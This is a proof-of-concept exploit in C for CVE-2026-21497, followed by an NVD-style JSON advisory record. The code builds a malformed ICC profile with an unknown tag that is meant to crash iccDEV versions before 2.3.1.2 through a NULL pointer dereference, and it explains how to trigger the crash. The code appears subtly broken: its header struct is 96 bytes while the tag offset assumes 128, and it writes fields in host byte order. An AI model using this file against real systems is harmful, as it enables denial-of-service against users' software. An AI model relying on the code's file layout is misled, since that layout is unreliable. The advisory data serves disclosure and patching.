CVE-2026-21497

/* * CVE-2026-21497 PoC - iccDEV NULL Pointer Dereference * This PoC generates a malicious ICC profile with an unknown tag * that triggers NULL pointer dereference in iccDEV < 2.3.1.2 * * Usage: compile with iccDEV library and run * gcc -o poc poc.c -liccDEV */ #include <stdio.h> #include <stdlib.h> #include <string.h> /* ICC Profile Header Structure */ typedef struct { char size[4]; /* Profile size */ char cmm_type[4]; /* CMM type */ char version[4]; /* Profile version */ char device_class[4]; /* Device class */ char color_space[4]; /* Color space */ char pcs[4]; /* PCS */ char date[12]; /* Creation date */ char signature[4]; /* 'acsp' */ char platform[4]; /* Primary platform */ char flags[4]; /* Profile flags */ char manufacturer[4]; /* Device manufacturer */ char model[4]; /* Device model */ char attributes[4]; /* Device attributes */ char rendering_intent[4]; /* Rendering intent */ char illuminant[12]; /* PCS illuminant */ char creator[4]; /* Profile creator */ char profile_id[16]; /* Profile ID */ } ICC_Header; /* Tag Table Entry */ typedef struct { char signature[4]; /* Tag signature */ char offset[4]; /* Offset to tag data */ char size[4]; /* Tag data size */ } TagEntry; void create_malicious_icc_profile(const char* filename) { FILE *fp = fopen(filename, "wb"); if (!fp) { printf("[-] Failed to create file\n"); return; } /* Initialize header */ ICC_Header header = {0}; /* Set profile size (will be updated) */ *(unsigned int*)header.size = 0x00000200; /* 512 bytes */ /* Set version to 2.3 */ *(unsigned int*)header.version = 0x02300000; /* Set device class and color space */ memcpy(header.device_class, "mntr", 4); /* Monitor */ memcpy(header.color_space, "RGB ", 4); memcpy(header.pcs, "Lab ", 4); memcpy(header.signature, "acsp", 4); /* Write header */ fwrite(&header, sizeof(ICC_Header), 1, fp); /* Write tag count */ unsigned int tag_count = 1; fwrite(&tag_count, 4, 1, fp); /* Create malicious tag entry with unknown signature */ TagEntry tag = {0}; memcpy(tag.signature, "XXXX", 4); /* Unknown tag - triggers vulnerability */ *(unsigned int*)tag.offset = 128 + sizeof(TagEntry) * tag_count; *(unsigned int*)tag.size = 12; fwrite(&tag, sizeof(TagEntry), 1, fp); /* Write padding */ char padding[256] = {0}; fwrite(padding, 256, 1, fp); fclose(fp); printf("[+] Malicious ICC profile created: %s\n", filename); printf("[+] Unknown tag signature 'XXXX' will trigger NULL pointer dereference\n"); } int main(int argc, char* argv[]) { const char* output_file = "malicious_profile.icc"; if (argc > 1) { output_file = argv[1]; } printf("[*] Generating PoC for CVE-2026-21497\n"); printf("[*] Target: iccDEV < 2.3.1.2\n"); printf("[*] Vulnerability: NULL Pointer Dereference in tag parser\n"); create_malicious_icc_profile(output_file); printf("[+] PoC generated successfully\n"); printf("[+] To trigger: Load this ICC profile using vulnerable iccDEV version\n"); return 0; }

{"cve": {"id": "CVE-2026-21497", "sourceIdentifier": "[email protected]", "published": "2026-01-07T18:15:53.483", "lastModified": "2026-01-09T21:59:42.477", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of ICC color management profiles. Prior to version 2.3.1.2, iccDEV is vulnerable to NULL pointer dereference via an unknown tag parser. This issue has been patched in version 2.3.1.2."}, {"lang": "es", "value": "iccDEV proporciona un conjunto de bibliotecas y herramientas que permiten la interacción, manipulación y aplicación de perfiles de gestión de color ICC. Antes de la versión 2.3.1.2, iccDEV es vulnerable a una desreferencia de puntero NULL mediante un analizador de etiquetas desconocido. Este problema ha sido parcheado en la versión 2.3.1.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-20"}, {"lang": "en", "value": "CWE-252"}, {"lang": "en", "value": "CWE-476"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-476"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:color:iccdev:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.3.1.2", "matchCriteriaId": "D34CF745-E75A-4F1C-AD7B-9AC1A2E9F680"}]}]}], "references": [{"url": "https://github.com/InternationalColorConsortium/iccDEV/commit/9419cac7f084197941994b8b9d17def204008385", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/InternationalColorConsortium/iccDEV/issues/374", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking"]}, {"url": "https://github.com/InternationalColorConsortium/iccDEV/pull/403", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-7gv7-cmrv-4j85", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}